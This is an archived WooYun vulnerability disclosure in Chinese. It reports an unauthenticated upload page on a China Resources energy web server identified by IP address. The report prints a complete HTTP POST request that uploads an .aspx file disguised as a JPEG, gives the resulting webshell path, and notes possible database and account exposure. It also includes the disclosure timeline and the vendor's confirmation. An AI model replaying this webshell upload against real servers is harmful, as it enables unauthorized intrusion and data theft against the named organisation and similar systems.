乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 细节已通知厂商并且等待厂商处理中 2015-10-22: 厂商已经确认,细节仅向厂商公开 2015-11-01: 细节向核心白帽子及相关领域专家公开 2015-11-11: 细节向普通白帽子公开 2015-11-21: 细节向实习白帽子公开 2015-12-06: 细节向公众公开
影响内网安全
http://58.251.8.70:8000/
华润新能源控股
http://58.251.8.70:8000/ftb.imagegallery.aspx
未授权访问上传点
POST /ftb.imagegallery.aspx HTTP/1.1Host: 58.251.8.70:8000Proxy-Connection: keep-aliveContent-Length: 2571Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://58.251.8.70:8000User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylZHA6qPIRnAM0BXfReferer: http://58.251.8.70:8000/ftb.imagegallery.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=t2nlcy45yr4wjs55d5wlxr45------WebKitFormBoundarylZHA6qPIRnAM0BXfContent-Disposition: form-data; name="__EVENTTARGET"ImageGallery1------WebKitFormBoundarylZHA6qPIRnAM0BXfContent-Disposition: form-data; name="__EVENTARGUMENT"UploadImage------WebKitFormBoundarylZHA6qPIRnAM0BXfContent-Disposition: form-data; name="__VIEWSTATE"/wEPDwUJNDA4MTA2OTg3ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUNSW1hZ2VHYWxsZXJ5MQ==------WebKitFormBoundarylZHA6qPIRnAM0BXfContent-Disposition: form-data; name="img_dim"on------WebKitFormBoundarylZHA6qPIRnAM0BXfContent-Disposition: form-data; name="command_UploadFile"; filename="1.aspx"Content-Type: image/jpegÿØÿà
可以配合iis6.0或者直接上传1.aspx
http://58.251.8.70:8000/images/shell.aspx
shell地址
数据库配置
没查看库的内容,估计可以泄露部分帐号
修改未授权文件
危害等级:高
漏洞Rank:15
确认时间:2015-10-22 17:37
感谢提交,这属于华润电力不属于万家
暂无